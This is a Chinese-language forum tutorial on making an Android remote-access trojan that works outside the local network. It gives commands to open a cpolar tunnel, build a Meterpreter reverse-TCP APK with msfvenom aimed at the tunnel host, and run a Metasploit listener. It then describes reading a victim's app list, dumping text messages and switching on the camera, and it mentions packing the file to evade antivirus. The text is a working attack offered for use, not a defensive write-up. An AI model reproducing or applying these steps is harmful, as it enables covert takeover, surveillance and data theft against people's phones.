注意 注意 注意
必须先安装必要模块才能生成
这个就不教了百度
我只教怎么生成外网木马
先注册cpolar,网站在这https://dashboard.cpolar.com/注册完点【验证】查看你的authtoken,然后复制到粘贴板后面用到。
然后去安装必要模块,官网教程 https://www.cpolar.com/blog/how-to-install-cpolar-under-android-termux-hyper-terminal
打不开点右上角浏览器打开
那么已经安装好后输入 ./cpolar tcp 端口号 端口号随便填的如下图,回车运行后看见这个界面如图3,复制下这个ip 1.tcp.cpolar.io 差点忘了还要记得你后面的端口号 10370
按CTRL+C退出,在linux后台运行cpolar代码如下nohup /data/data/com.termux/files/home/cpolar tcp -config=/data/data/com.termux/files/home/.cpolar/cpolar.yml -log=stdout 6666& (关闭linux后隧道会断开!)
好了,隧道打好了开始生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=1.tcp.cpolar.io LPORT=10370 R > /storage/emulated/0/360/HK.apk
上面的LHOST和LPORT是你cpolar的ip和端口图2
R>后面是木马生成路径,木马生成完了后发送到其他手机(应该没有哪个憨憨会安装一个报毒的软件,所以拿其他手机试了)。到linux依次输入
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 6666
(这里的ip要设置为图3的,如果显示localhost也输入127.0.0.1)
6666 这个端口号是你后台运行时在末尾输入的端口号见第三个[滑稽]
可以输入 show options 检查IP和端口的设置是否正确)
exploit
(运行完上面这个指令木马就开始监听了,只要目标机点击那个软件就会跳出meterpreter就可以为所欲为了)
好了教程……
下面是另一台手机点木马后的亚子(不在同一局域网)
输入help查看指令,app_list 查看对方手机上所有软件。还有dump_sms 导出对方手机短信内容(需要对方给软件写删信息权限),打开对方摄像头什么的
这个木马非局域网使用,裸木马会被手机报毒,所以还要加壳免杀,我也不会免杀,问题评论区看见就回